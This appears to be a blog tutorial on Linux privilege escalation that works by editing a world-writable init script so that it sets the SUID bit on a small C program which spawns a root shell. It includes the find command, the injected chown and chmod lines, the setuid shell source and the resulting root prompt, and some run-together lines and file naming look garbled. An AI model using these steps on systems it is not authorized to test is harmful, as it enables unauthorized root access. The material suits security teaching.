Exploiting Startup Scripts

Startups scripts are scripts that are executed at boot time. Linux startup scripts are generally located in /etc/init.d but this location can vary depending on the distribution. For example, you may find startup scripts under these locations: /etc/rc.d, /etc/rc.d/init.d, or /etc/init. These scripts can either be default scripts that are pre-installed, or they can be user created startup scripts.

To attack a vulnerable startup script, you must determine if you have write access to a certain startup script. If you have write access, you can inject your own malicious commands into the script and either wait for a reboot, or a force a reboot to trigger the script.

Below is an example of how you might attack a vulnerable startup script:

First identify any files that have write access enabled on them using the command below, and specifically look for files under the /etc/init.d directory. (We can exclude irrelevant output by piping our output with “| grep -v

user@target:$ find / -perm -o+w -type f 2>/dev/null | grep -v '/sys\|proc'/foo/bar/etc/init.d/cleanup.sh/foo/bar/foo

We notice that there is a startup script called cleanup.sh under the /etc/init.d directory that we have write access to. First, we should back this file up and then we can edit the startup script:

user@target:$ cp cleanup.sh /home/user/cleanup.sh.bakuser@target:$ nano cleanup.sh

We open the file and replace the original script with our malicious script:

chown root:root /home/user/pwn_script.cchmod 4755 /home/user/pwn_script

The script we just added to the startup script will change the file pwn_script.c in the user’s home directory so it has the SUID bit set on it which means when we run it, it will be run as root. Wait, we haven’t created the pwn_script.c yet so let’s go ahead and do that. We need to make sure it is located where it is pointing to in the startup script which in this case is /home/user/pwn_script.c

#include <stdio.h>#include <stdlib.h>int main(){setgid(0);setuid(0);system("/bin/bash");}

After we have created our malicious startup file and our pwn_script.c, we just need to wait for a reboot or trigger it manually.

After the system reboots, we can navigate to our pwn_script.c file and see the new permissions on it:

-rwsrwxr-x 1 root root 6700 April  9 14:43 /home/user/pwn_script.c

Notice the SUID bit is set on the permissions and the owner is root. After we run pwn_script.c, we should now have a root shell.

user@target:$ ./pwn_script.cbash-4.1# whoamiroot

--

--

--

I am a Security Consultant and formerly worked at PayPal as a Penetration Tester. At night I teach Cyber Security at UTexas. OSCP

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Evaluating Crypto Libraries Without Being a Cr ypto Expert

Protect Your Solidity Smart Contracts From Reentrancy Attacks

Bragging Rights(Part 1): Short story of a bug wave

[Some Interesting] Cloud ‘n Sec news: 07th Jan 22

Securing Home Server Based on Raspberry Pi against Dark Hacks

{UPDATE} Save The Pencil 2 Hack Free Resources Generator

Protecting your privacy while using Zoom

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Recipe For Root

Recipe For Root

I am a Security Consultant and formerly worked at PayPal as a Penetration Tester. At night I teach Cyber Security at UTexas. OSCP

More from Medium

What is DevSecOps?

How to Detect and Defeat the Log4j2 Vulnerability with Deepfence — Deepfence

5 Use Cases of Kondukto CLI in CI/CD pipelines

Defending Against Modern Malware Attacks in Ruby